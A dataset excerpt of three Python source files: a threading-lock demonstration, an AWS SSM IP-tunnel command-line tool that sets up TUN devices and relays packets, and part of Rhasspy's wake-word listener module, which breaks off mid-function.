source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
mutual_exclusion.py
|
'''
El propósito de este snipet es demostrar el uso de
mutual exlusion protegido , es decir con los metodos de adquitur y liberar.
Con estos puede solatr el lapiz.
'''
#!/usr/bin/env python3
""" Two shoppers adding items to a shared notepad """
import threading
import time
garlic_count = 0
pencil = threading.Lock()
def shopper():
global garlic_count
for i in range(5):
print(threading.current_thread().getName(), 'is thinking.')
time.sleep(0.5)
pencil.acquire()
garlic_count += 1
pencil.release()
if __name__ == '__main__':
barron = threading.Thread(target=shopper)
olivia = threading.Thread(target=shopper)
barron.start()
olivia.start()
barron.join()
olivia.join()
print('We should buy', garlic_count, 'garlic.')
|
ssm_tunnel_cli.py
|
#!/usr/bin/env python3
# Set up IP tunnel through SSM-enabled instance.
#
# See https://aws.nz/aws-utils/ssm-tunnel for more info.
#
# Author: Michael Ludvig (https://aws.nz)
import os
import sys
import time
import copy
import errno
import threading
import random
import struct
import select
import fcntl
import argparse
import ipaddress
from base64 import b64encode, b64decode
import pexpect
import botocore.exceptions
from .common import *
from .talker import SsmTalker
from .resolver import InstanceResolver
logger_name = "ssm-tunnel"
tunnel_cidr = "100.64.0.0/16"
keepalive_sec = 10
def parse_args():
"""
Parse command line arguments.
"""
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
group_general = add_general_parameters(parser)
group_instance = parser.add_argument_group('Instance Selection')
group_instance.add_argument('INSTANCE', nargs='?', help='Instance ID, Name, Host name or IP address')
group_instance.add_argument('--list', '-l', dest='list', action="store_true", help='List instances registered in SSM.')
group_network = parser.add_argument_group('Networking Options')
group_network.add_argument('--route', '-r', metavar="ROUTE", dest="routes", type=str, action="append",
help='CIDR(s) to route through this tunnel. May be used multiple times.')
group_network.add_argument('--tunnel-cidr', metavar="CIDR", type=str, default=tunnel_cidr, help=f'''By default
the tunnel endpoint IPs are randomly assigned from the reserved {tunnel_cidr} block (RFC6598).
This should be ok for most users.''')
group_network.add_argument('--up-down', metavar="SCRIPT", dest='updown_script', type=str, help='''Script to call
during tunnel start up and close down. Check out 'ssm-tunnel-updown.dns-example' that
supports setting a custom DNS server when the tunnel goes up.''')
parser.description = 'Start IP tunnel to a given SSM instance'
parser.epilog = f'''
IMPORTANT: instances must be registered in AWS Systems Manager (SSM)
before you can copy files to/from them! Instances not registered in SSM
will not be recognised by {parser.prog} nor show up in --list output.
Visit https://aws.nz/aws-utils/ssm-tunnel for more info and usage examples.
Author: Michael Ludvig
'''
# Parse supplied arguments
args = parser.parse_args()
# If --version do it now and exit
if args.show_version:
show_version(args)
# Require exactly one of INSTANCE or --list
if bool(args.INSTANCE) + bool(args.list) != 1:
parser.error("Specify either INSTANCE or --list")
return args
class SsmTunnel(SsmTalker):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Stats structure
self.stats = { 'ts': 0, 'l2r': 0, 'r2l': 0 }
self.stats_lock = threading.Lock()
self.stats_secs = 10
self.stats_refresh = 0.5 # Print stats every this many seconds
self._exiting = False
self.tun_name = self._tun_fd = None
self.local_ip = self.remote_ip = self.routes = None
self.updown_script = self.updown_up_success = None
def run_command(self, command, assert_0=True):
self._logger.debug("command: %s", command)
ret = os.system(command)
if assert_0:
assert ret == 0
def open_remote_tunnel(self):
self._logger.debug('Creating tunnel')
# Open remote tun0 device
self._child.sendline(f"ssm-tunnel-agent {self.remote_ip} {self.local_ip}")
patterns = ['# Agent device .* is ready', 'command not found']
match = self._child.expect(patterns)
if match != 0: # Index matched in the 'patterns'
self._logger.error("Unable to establish the tunnel!")
self._logger.error("ssm-tunnel-agent: command not found on the target instance %s.", self._instance_id)
self._logger.error("Use 'ssm-session %s' and then run 'sudo pip install aws-ssm-tunnel-agent' to install it.", self._instance_id)
quit(1)
self._logger.debug(self._child.after)
def open_local_tunnel(self):
tun_suffix = ".".join(self.local_ip.split(".")[2:])
self.tun_name = f"tunSSM.{tun_suffix}"
self.create_tun()
self._tun_fd = self.open_tun()
self._logger.debug(f"# Local device {self.tun_name} is ready")
self._logger.info(f"Local IP: {self.local_ip} / Remote IP: {self.remote_ip}")
def create_tun(self):
try:
user_id = os.getuid()
self.run_command(f"sudo ip tuntap add {self.tun_name} mode tun user {user_id}")
self.run_command(f"sudo ip addr add {self.local_ip} peer {self.remote_ip} dev {self.tun_name}")
self.run_command(f"sudo ip link set {self.tun_name} up")
# Configure routes
for route in self.routes:
self.run_command(f"sudo ip route add {route} via {self.remote_ip}")
except AssertionError:
self.delete_tun()
quit(1)
except Exception as e:
self._logger.exception(e)
self.delete_tun()
raise
def delete_tun(self):
# We don't check return code here - best effort to close and delete the device
if self._tun_fd is not None:
try:
os.close(self._tun_fd)
self._tun_fd = None
except Exception as e:
self._logger.exception(e)
if self.tun_name is not None:
self.run_command(f"sudo ip link set {self.tun_name} down", assert_0=False)
self.run_command(f"sudo ip tuntap del {self.tun_name} mode tun", assert_0=False)
self.tun_name = None
def open_tun(self):
TUNSETIFF = 0x400454ca
IFF_TUN = 0x0001
tun_fd = os.open("/dev/net/tun", os.O_RDWR)
flags = IFF_TUN
ifr = struct.pack('16sH22s', self.tun_name.encode(), flags, b'\x00'*22)
fcntl.ioctl(tun_fd, TUNSETIFF, ifr)
return tun_fd
def local_to_remote(self):
last_ts = time.time()
while True:
if self._exiting:
break
try:
r, w, x = select.select([self._tun_fd], [], [], 1)
if not self._tun_fd in r:
if last_ts + keepalive_sec < time.time():
# Keepalive timeout - send '#'
self._child.sendline("#")
last_ts = time.time()
continue
buf = os.read(self._tun_fd, 1504) # Virtual GRE header adds 4 bytes
self._child.sendline("%{}".format(b64encode(buf).decode('ascii')))
except OSError as e:
if e.errno == errno.EBADF and self._exiting:
break
last_ts = time.time()
# Update stats
self.stats_lock.acquire()
self.stats['l2r'] += len(buf)
self.stats_lock.release()
self._logger.debug("local_to_remote() has exited.")
def remote_to_local(self):
while True:
if self._exiting:
break
try:
line = self._child.readline()
except pexpect.exceptions.TIMEOUT:
# This is a long timeout, 30 sec, not very useful
continue
if type(self._child.after) == pexpect.exceptions.EOF:
self._logger.warn("Received unexpected EOF - tunnel went down?")
self._exiting = True
break
if not line or line[0] != '%':
continue
buf = b64decode(line[1:].strip('\r\n'))
os.write(self._tun_fd, buf)
# Update stats
self.stats_lock.acquire()
self.stats['r2l'] += len(buf)
self.stats_lock.release()
self._logger.debug("remote_to_local() has exited.")
def process_traffic(self):
tr_l2r = threading.Thread(target=self.local_to_remote, args=[])
tr_l2r.daemon = True
tr_l2r.start()
tr_r2l = threading.Thread(target=self.remote_to_local, args=[])
tr_r2l.daemon = True
tr_r2l.start()
try:
self.display_stats()
except KeyboardInterrupt:
print("") # Just to avoid "^C" at the end of line
def run_updown(self, status):
if not self.updown_script:
return
if status == "down" and not self.updown_up_success:
# If 'up' failed we are immediately called with 'down' - don't do anything.
return
routes = " ".join(self.routes)
try:
cmd = f"{self.updown_script} {status} {self.tun_name} {self.local_ip} {self.remote_ip} {routes}"
self._logger.info(f"Running --up-down script: {cmd}")
self.run_command(cmd)
self.updown_up_success = True
except AssertionError:
self._logger.error(f'Updown script {self.updown_script} exitted with error.')
sys.exit(1)
def start(self, local_ip, remote_ip, routes, updown_script):
self.local_ip = local_ip
self.remote_ip = remote_ip
self.routes = routes
self.updown_script = updown_script
try:
self.open_remote_tunnel()
self.open_local_tunnel()
self.run_updown("up")
self.process_traffic()
finally:
self._logger.info('Closing tunnel, please wait...')
self.run_updown("down")
self.exit()
self._exiting = True
self.delete_tun()
def display_stats(self):
def _erase_line():
print('\r\x1B[K', end="") # Erase line
stat_history = [self.stats]
stat_history_len = int(self.stats_secs / self.stats_refresh)
start_ts = time.time()
while True:
time.sleep(self.stats_refresh)
# Take another 'stat' snapshot
self.stats_lock.acquire()
stat_history.insert(1, copy.copy(self.stats))
self.stats_lock.release()
stat_history[1]['ts'] = time.time()
# Calculate sliding window average
if stat_history[1]['ts'] > stat_history[-1]['ts']:
l2r_avg = (stat_history[1]['l2r'] - stat_history[-1]['l2r'])/(stat_history[1]['ts'] - stat_history[-1]['ts'])
r2l_avg = (stat_history[1]['r2l'] - stat_history[-1]['r2l'])/(stat_history[1]['ts'] - stat_history[-1]['ts'])
else:
l2r_avg = r2l_avg = 0.0
# Trim the oldest points
del(stat_history[stat_history_len+1:])
uptime = seconds_to_human(time.time()-start_ts, decimal=0)
l2r_t_h, l2r_t_u = bytes_to_human(stat_history[1]['l2r'])
r2l_t_h, r2l_t_u = bytes_to_human(stat_history[1]['r2l'])
l2r_a_h, l2r_a_u = bytes_to_human(l2r_avg)
r2l_a_h, r2l_a_u = bytes_to_human(r2l_avg)
_erase_line()
print(f"{uptime} | In: {r2l_t_h:6.1f}{r2l_t_u:>2s} @ {r2l_a_h:6.1f}{r2l_a_u:>2s}/s | Out: {l2r_t_h:6.1f}{l2r_t_u:>2s} @ {l2r_a_h:6.1f}{l2r_a_u:>2s}/s", end="", flush=True)
def random_ips(network):
# Network address
net = ipaddress.ip_network(network)
# Random host-part
host_bytes = int(random.uniform(2, 2**(net.max_prefixlen-net.prefixlen)-4))&0xFFFFFFFE
# Construct local/remote IP
local_ip = net.network_address + host_bytes
remote_ip = net.network_address + host_bytes + 1
return local_ip.compressed, remote_ip.compressed
def main():
if sys.platform != "linux":
print("The 'ssm-tunnel' program only works on Linux at the moment!", file=sys.stderr)
print("In other systems you are welcome to install it in VirtualBox or in a similar virtual environment running Linux.", file=sys.stderr)
quit(1)
## Split command line args
args = parse_args()
logger = configure_logging(logger_name, args.log_level)
tunnel = None
try:
if args.list:
# --list
InstanceResolver(args).print_list()
quit(0)
instance_id = InstanceResolver(args).resolve_instance(args.INSTANCE)
if not instance_id:
logger.warning("Could not resolve Instance ID for '%s'", args.INSTANCE)
logger.warning("Perhaps the '%s' is not registered in SSM?", args.INSTANCE)
quit(1)
local_ip, remote_ip = random_ips(args.tunnel_cidr)
tunnel = SsmTunnel(instance_id, profile=args.profile, region=args.region, logger_name=logger_name)
tunnel.start(local_ip, remote_ip, args.routes or [], args.updown_script)
except (botocore.exceptions.BotoCoreError,
botocore.exceptions.ClientError) as e:
logger.error(e)
quit(1)
finally:
if tunnel:
tunnel.delete_tun()
if __name__ == "__main__":
main()
|
wake.py
|
"""Wake word support."""
import json
import os
import re
import shutil
import struct
import subprocess
import threading
import time
from pathlib import Path
from typing import Any, Dict, Iterable, List, Optional, Type
from rhasspy.actor import RhasspyActor
from rhasspy.events import (
AudioData,
ListenForWakeWord,
MqttMessage,
MqttSubscribe,
PauseListeningForWakeWord,
ResumeListeningForWakeWord,
StartStreaming,
StopListeningForWakeWord,
StopStreaming,
WakeWordDetected,
WakeWordNotDetected,
)
from rhasspy.utils import read_dict
# -----------------------------------------------------------------------------
def get_wake_class(system: str) -> Type[RhasspyActor]:
"""Get type for profile wake system."""
assert system in [
"dummy",
"pocketsphinx",
"hermes",
"snowboy",
"precise",
"porcupine",
"command",
], f"Invalid wake system: {system}"
if system == "pocketsphinx":
# Use pocketsphinx locally
return PocketsphinxWakeListener
if system == "hermes":
# Use remote system via MQTT
return HermesWakeListener
if system == "snowboy":
# Use snowboy locally
return SnowboyWakeListener
if system == "precise":
# Use Mycroft Precise locally
return PreciseWakeListener
if system == "porcupine":
# Use Picovoice's porcupine locally
return PorcupineWakeListener
if system == "command":
# Use command-line listener
return CommandWakeListener
# Use dummy listener as a fallback
return DummyWakeListener
# -----------------------------------------------------------------------------
class DummyWakeListener(RhasspyActor):
"""Does nothing"""
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
pass
# -----------------------------------------------------------------------------
# Pocketsphinx based wake word listener
# https://github.com/cmusphinx/pocketsphinx
# -----------------------------------------------------------------------------,
class PocketsphinxWakeListener(RhasspyActor):
"""Listens for a wake word with pocketsphinx."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.decoder = None
self.decoder_started: bool = False
self.preload = False
self.not_detected = False
self.chunk_size = 960
self.recorder: Optional[RhasspyActor] = None
self.threshold = 0.0
self.keyphrase = ""
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.pocketsphinx.chunk_size", 960)
if self.preload:
with self._lock:
try:
self.load_decoder()
except Exception:
self._logger.exception("loading wake decoder")
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
self.load_decoder()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
if not self.decoder_started:
assert self.decoder is not None
self.decoder.start_utt()
self.decoder_started = True
audio_data = message.data
chunk = audio_data[: self.chunk_size]
detected = False
while chunk:
result = self.process_data(chunk)
if result is not None:
detected = True
self._logger.debug("Hotword detected (%s)", self.keyphrase)
detected_msg = WakeWordDetected(
self.keyphrase, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, detected_msg)
break
audio_data = audio_data[self.chunk_size :]
chunk = audio_data[: self.chunk_size]
# End utterance
if detected and self.decoder_started:
assert self.decoder is not None
self.decoder.end_utt()
self.decoder_started = False
if not detected and self.not_detected:
# Report non-detection
not_detected_msg = WakeWordNotDetected(
self.keyphrase, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_msg)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
# End utterance
if self.decoder_started:
assert self.decoder is not None
self.decoder.end_utt()
self.decoder_started = False
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> Optional[str]:
"""Process single chunk of audio."""
assert self.decoder is not None
self.decoder.process_raw(data, False, False)
hyp = self.decoder.hyp()
if hyp:
if self.decoder_started:
self.decoder.end_utt()
self.decoder_started = False
return hyp.hypstr
return None
# -------------------------------------------------------------------------
def load_decoder(self) -> None:
"""Loads speech decoder if not cached."""
if self.decoder is None:
import pocketsphinx
# Load decoder settings (use speech-to-text configuration as a fallback)
hmm_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.acoustic_model", None)
or self.profile.get("speech_to_text.pocketsphinx.acoustic_model")
)
dict_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.dictionary", None)
or self.profile.get("speech_to_text.pocketsphinx.dictionary")
)
self.threshold = float(
self.profile.get("wake.pocketsphinx.threshold", 1e-40)
)
self.keyphrase = self.profile.get("wake.pocketsphinx.keyphrase", "")
assert self.keyphrase, "No wake keyphrase"
# Verify that keyphrase words are in dictionary
keyphrase_words = re.split(r"\s+", self.keyphrase)
with open(dict_path, "r") as dict_file:
word_dict = read_dict(dict_file)
dict_upper = self.profile.get("speech_to_text.dictionary_upper", False)
for word in keyphrase_words:
if dict_upper:
word = word.upper()
else:
word = word.lower()
if word not in word_dict:
self._logger.warning("%s not in dictionary", word)
self._logger.debug(
"Loading wake decoder with hmm=%s, dict=%s", hmm_path, dict_path
)
decoder_config = pocketsphinx.Decoder.default_config()
decoder_config.set_string("-hmm", hmm_path)
decoder_config.set_string("-dict", dict_path)
decoder_config.set_string("-keyphrase", self.keyphrase)
decoder_config.set_string("-logfn", "/dev/null")
decoder_config.set_float("-kws_threshold", self.threshold)
mllr_path = self.profile.read_path(
self.profile.get("wake.pocketsphinx.mllr_matrix")
)
if os.path.exists(mllr_path):
self._logger.debug(
"Using tuned MLLR matrix for acoustic model: %s", mllr_path
)
decoder_config.set_string("-mllr", mllr_path)
self.decoder = pocketsphinx.Decoder(decoder_config)
self.decoder_started = False
# -----------------------------------------------------------------------------
# Snowboy wake listener
# https://snowboy.kitt.ai
# -----------------------------------------------------------------------------
class SnowboyWakeListener(RhasspyActor):
"""Listen for wake word with snowboy."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.detectors: List[Any] = []
self.preload = False
self.not_detected = False
self.chunk_size = 960
self.recorder: Optional[RhasspyActor] = None
self.apply_frontend = False
self.models: Dict[str, Any] = {}
self.model_names: List[str] = []
self.single_detection: bool = True
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.snowboy.chunk_size", 960)
self.single_detection = self.profile.get("wake.snowboy.single_detection", True)
if self.preload:
try:
self.load_detectors()
except Exception as e:
self._logger.warning("preload: %s", e)
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_detectors()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("in_loaded")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, AudioData):
audio_data = message.data
chunk = audio_data[: self.chunk_size]
detected = []
while chunk:
for detector_index, result_index in enumerate(self.process_data(chunk)):
if result_index > 0:
detected.append(detector_index)
if detected:
# Don't process the rest of the audio data if hotword has
# already been detected.
break
audio_data = audio_data[self.chunk_size :]
chunk = audio_data[: self.chunk_size]
# Handle results
if detected:
# Detected
detected_names = [self.model_names[i] for i in detected]
self._logger.debug("Hotword(s) detected: %s", detected_names)
# Send events
for model_name in detected_names:
detected_event = WakeWordDetected(
model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, detected_event)
if self.single_detection:
# Only allow for a single hotword to be detected
break
elif self.not_detected:
# Not detected
for model_name in self.model_names:
not_detected_event = WakeWordNotDetected(
model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_event)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -------------------------------------------------------------------------
def process_data(self, data: bytes) -> Iterable[int]:
"""Process single chunk of audio data."""
try:
for detector in self.detectors:
# Return is:
# -2 silence
# -1 error
# 0 voice
# n index n-1
yield detector.RunDetection(data)
except Exception:
self._logger.exception("process_data")
# All silences
return [-2] * len(self.detectors)
# -------------------------------------------------------------------------
def load_detectors(self) -> None:
"""Load snowboy detector."""
if not self.detectors:
from snowboy import snowboydetect, snowboydecoder
# Load model names and settings
self.models = self._parse_models()
self.model_names = sorted(self.models)
# Create snowboy detectors
for model_name in self.model_names:
model_settings = self.models[model_name]
model_path = Path(self.profile.read_path(model_name))
assert model_path.is_file(), f"Missing {model_path}"
self._logger.debug("Loading snowboy model from %s", model_path)
detector = snowboydetect.SnowboyDetect(
snowboydecoder.RESOURCE_FILE.encode(), str(model_path).encode()
)
detector.SetSensitivity(str(model_settings["sensitivity"]).encode())
detector.SetAudioGain(float(model_settings["audio_gain"]))
detector.ApplyFrontend(bool(model_settings["apply_frontend"]))
self.detectors.append(detector)
self._logger.debug(
"Loaded snowboy model %s (%s)", model_name, model_settings
)
# -------------------------------------------------------------------------
def _parse_models(self) -> Dict[str, Dict[str, Any]]:
# Default sensitivity
sensitivity: str = str(self.profile.get("wake.snowboy.sensitivity", "0.5"))
# Default audio gain
audio_gain: float = float(self.profile.get("wake.snowboy.audio_gain", "1.0"))
# Default frontend
apply_frontend: bool = self.profile.get("wake.snowboy.apply_frontend", False)
model_names: List[str] = self.profile.get(
"wake.snowboy.model", "snowboy/snowboy.umdl"
).split(",")
model_settings: Dict[str, Dict[str, Any]] = self.profile.get(
"wake.snowboy.model_settings", {}
)
models_dict = {}
for model_name in model_names:
# Add default settings
settings = model_settings.get(model_name, {})
if "sensitivity" not in settings:
settings["sensitivity"] = sensitivity
if "audio_gain" not in settings:
settings["audio_gain"] = audio_gain
if "apply_frontend" not in settings:
settings["apply_frontend"] = apply_frontend
models_dict[model_name] = settings
return models_dict
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems at startup."""
problems: Dict[str, Any] = {}
try:
# pylint: disable=W0611
from snowboy import snowboydetect, snowboydecoder # noqa: F401
except Exception:
problems[
"snowboy not installed"
] = "The snowboy Python library is not installed. Try pip3 install snowboy"
# Verify that all snowboy models exist
models = self._parse_models()
model_paths = [
Path(self.profile.read_path(model_name)) for model_name in models
]
for model_path in model_paths:
if not model_path.is_file():
problems[
"Missing model"
] = f"Snowboy model could not be loaded from {model_path}"
return problems
# -----------------------------------------------------------------------------
# Mycroft Precise wake listener
# https://github.com/MycroftAI/mycroft-precise
# -----------------------------------------------------------------------------
class PreciseWakeListener(RhasspyActor):
"""Listens for a wake word using Mycroft Precise."""
def __init__(self) -> None:
# pylint: disable=E0401
from precise_runner import ReadWriteStream
RhasspyActor.__init__(self)
self.audio_buffer: bytes = bytes()
self.audio_info: Dict[Any, Any] = {}
self.chunk_delay = 0
self.chunk_size = 2048
self.detected: bool = False
self.engine = None
self.engine_path = ""
self.model_name = ""
self.model_path = ""
self.prediction_sem = threading.Semaphore()
self.preload = False
self.receivers: List[RhasspyActor] = []
self.recorder: Optional[RhasspyActor] = None
self.runner = None
self.send_not_detected = False
self.stream: Optional[ReadWriteStream] = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.preload = self.config.get("preload", False)
self.send_not_detected = self.config.get("not_detected", False)
self.chunk_size = self.profile.get("wake.precise.chunk_size", 2048)
self.chunk_delay = self.profile.get("wake.precise.chunk_delay", 0)
if self.preload:
try:
self.load_runner()
except Exception:
pass
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_runner()
self.receivers.append(message.receiver or sender)
self.transition("listening")
if message.record:
self.send(self.recorder, StartStreaming(self.myAddress))
except Exception:
self._logger.exception("in_loaded")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
try:
if isinstance(message, AudioData):
self.audio_info = message.info
self.detected = False
self.audio_buffer += message.data
num_chunks = len(self.audio_buffer) // self.chunk_size
if num_chunks > 0:
assert self.stream is not None
self.prediction_sem = threading.Semaphore()
for _ in range(num_chunks):
chunk = self.audio_buffer[: self.chunk_size]
self.stream.write(chunk)
self.audio_buffer = self.audio_buffer[self.chunk_size :]
if self.send_not_detected:
# Wait for all chunks to finish processing
for _ in range(num_chunks):
self.prediction_sem.acquire(timeout=0.1)
# Wait a little bit for the precise engine to finish processing
time.sleep(self.chunk_delay)
if not self.detected:
# Not detected
not_detected_event = WakeWordNotDetected(
self.model_name, audio_data_info=message.info
)
for receiver in self.receivers:
self.send(receiver, not_detected_event)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
if message.record:
self.send(self.recorder, StopStreaming(self.myAddress))
self.transition("loaded")
elif isinstance(message, str):
# Detected
self._logger.debug("Hotword detected (%s)", self.model_name)
detected_event = WakeWordDetected(
self.model_name, audio_data_info=self.audio_info
)
for receiver in self.receivers:
self.send(receiver, detected_event)
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
except Exception:
self._logger.exception("in_listening")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
def to_stopped(self, from_state: str) -> None:
"""Transition to stopped state."""
self.stream = None
if self.runner is not None:
self.runner.stop()
# -------------------------------------------------------------------------
def load_runner(self) -> None:
"""Load precise runner."""
if self.engine is None:
# pylint: disable=E0401
from precise_runner import PreciseEngine
self.model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
self.model_path = self.profile.read_path(self.model_name)
self.engine_path = os.path.expandvars(
self.profile.get("wake.precise.engine_path", "precise-engine")
)
self._logger.debug("Loading Precise engine at %s", self.engine_path)
self.engine = PreciseEngine(
self.engine_path, self.model_path, chunk_size=self.chunk_size
)
if self.runner is None:
# pylint: disable=E0401
from precise_runner import PreciseRunner, ReadWriteStream
self.stream = ReadWriteStream()
sensitivity = float(self.profile.get("wake.precise.sensitivity", 0.5))
trigger_level = int(self.profile.get("wake.precise.trigger_level", 3))
def on_prediction(prob: float) -> None:
self.prediction_sem.release()
def on_activation() -> None:
self.detected = True
self.send(self.myAddress, "activated")
self.runner = PreciseRunner(
self.engine,
stream=self.stream,
sensitivity=sensitivity,
trigger_level=trigger_level,
on_activation=on_activation,
on_prediction=on_prediction,
)
assert self.runner is not None
self.runner.start()
self._logger.debug(
"Loaded Mycroft Precise (model=%s, sensitivity=%s, trigger_level=%s)",
self.model_path,
sensitivity,
trigger_level,
)
# -------------------------------------------------------------------------
def get_problems(self) -> Dict[str, Any]:
"""Get problems at startup."""
problems: Dict[str, Any] = {}
try:
# pylint: disable=E0401,W0611
from precise_runner import PreciseRunner, ReadWriteStream # noqa: F401
except Exception:
problems[
"precise_runner not installed"
] = "The precise_runner Python library is not installed. Try pip3 install precise_runner"
engine_path = os.path.expandvars(
self.profile.get("wake.precise.engine_path", "precise-engine")
)
if not os.path.exists(engine_path) and not shutil.which(engine_path):
problems[
"Missing precise-engine"
] = 'The Mycroft Precise engine is not installed. Follow the <a href="https://github.com/MycroftAI/mycroft-precise#binary-install">binary install instructions</a>.'
model_name = self.profile.get("wake.precise.model", "hey-mycroft-2.pb")
model_path = self.profile.read_path(model_name)
if not os.path.exists(model_path):
problems[
"Missing model"
] = f"Your Mycroft Precise model could not be loaded from {model_path}"
return problems
# -----------------------------------------------------------------------------
# MQTT-based wake listener (Hermes protocol)
# https://docs.snips.ai/reference/hermes
# -----------------------------------------------------------------------------
class HermesWakeListener(RhasspyActor):
"""Listens for a wake word using MQTT."""
def __init__(self) -> None:
RhasspyActor.__init__(self)
self.receivers: List[RhasspyActor] = []
self.site_ids = "default"
self.wakeword_id = "default"
self.wake_topic = ""
self.mqtt: Optional[RhasspyActor] = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.mqtt = self.config["mqtt"]
# Subscribe to wake topic
self.site_ids = self.profile.get("mqtt.site_id", "default").split(",")
self.wakeword_id = self.profile.get("wake.hermes.wakeword_id", "default")
self.wake_topic = f"hermes/hotword/{self.wakeword_id}/detected"
self.send(self.mqtt, MqttSubscribe(self.wake_topic))
self.transition("loaded")
def in_loaded(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in loaded state."""
if isinstance(message, ListenForWakeWord):
self.receivers.append(message.receiver or sender)
self.transition("listening")
def in_listening(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in listening state."""
if isinstance(message, MqttMessage):
if message.topic == self.wake_topic:
# Check site ID
payload = json.loads(message.payload.decode())
payload_site_id = payload.get("siteId", "")
if payload_site_id not in self.site_ids:
self._logger.debug(
"Got detected message, but wrong site id (%s)", payload_site_id
)
return
# Pass downstream to receivers
self._logger.debug("Hotword detected (%s)", self.wakeword_id)
result = WakeWordDetected(self.wakeword_id)
for receiver in self.receivers:
self.send(receiver, result)
elif isinstance(message, StopListeningForWakeWord):
if message.clear_all:
self.receivers.clear()
else:
try:
self.receivers.remove(message.receiver or sender)
except ValueError:
pass
if not self.receivers:
self.transition("loaded")
elif isinstance(message, PauseListeningForWakeWord):
self.transition("paused")
def in_paused(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in paused state."""
if isinstance(message, ResumeListeningForWakeWord):
self.transition("listening")
# -----------------------------------------------------------------------------
# Porcupine Wake Listener
# https://github.com/Picovoice/Porcupine
# -----------------------------------------------------------------------------
class PorcupineWakeListener(RhasspyActor):
"""Wake word listener that uses picovoice's porcupine library"""
def __init__(self):
RhasspyActor.__init__(self)
self.audio_buffer: bytes = bytes()
self.chunk_format = ""
self.chunk_size = 1024
self.handle = None
self.keyword_paths: List[Path] = []
self.library_path = ""
self.model_path = ""
self.preload: bool = False
self.receivers: List[RhasspyActor] = []
self.recorder: Optional[RhasspyActor] = None
self.sensitivities = []
self.wake_proc = None
def to_started(self, from_state: str) -> None:
"""Transition to started state."""
self.recorder = self.config["recorder"]
self.library_path = self.profile.read_path(
self.profile.get(
"wake.porcupine.library_path", "porcupine/libpv_porcupine.so"
)
)
self.model_path = self.profile.read_path(
self.profile.get(
"wake.porcupine.model_path", "porcupine/porcupine_params.pv"
)
)
self.keyword_paths = [
Path(self.profile.read_path(p))
for p in self.profile.get(
"wake.porcupine.keyword_path", "porcupine/porcupine.ppn"
).split(",")
]
self.sensitivities = [
float(s)
for s in str(self.profile.get("wake.porcupine.sensitivity", "0.5")).split(
","
)
]
self.preload = self.config.get("preload", False)
if self.preload:
try:
self.load_handle()
except Exception:
self._logger.exception("loading wake handle")
def in_started(self, message: Any, sender: RhasspyActor) -> None:
"""Handle messages in started state."""
if isinstance(message, ListenForWakeWord):
try:
self.load_handle()
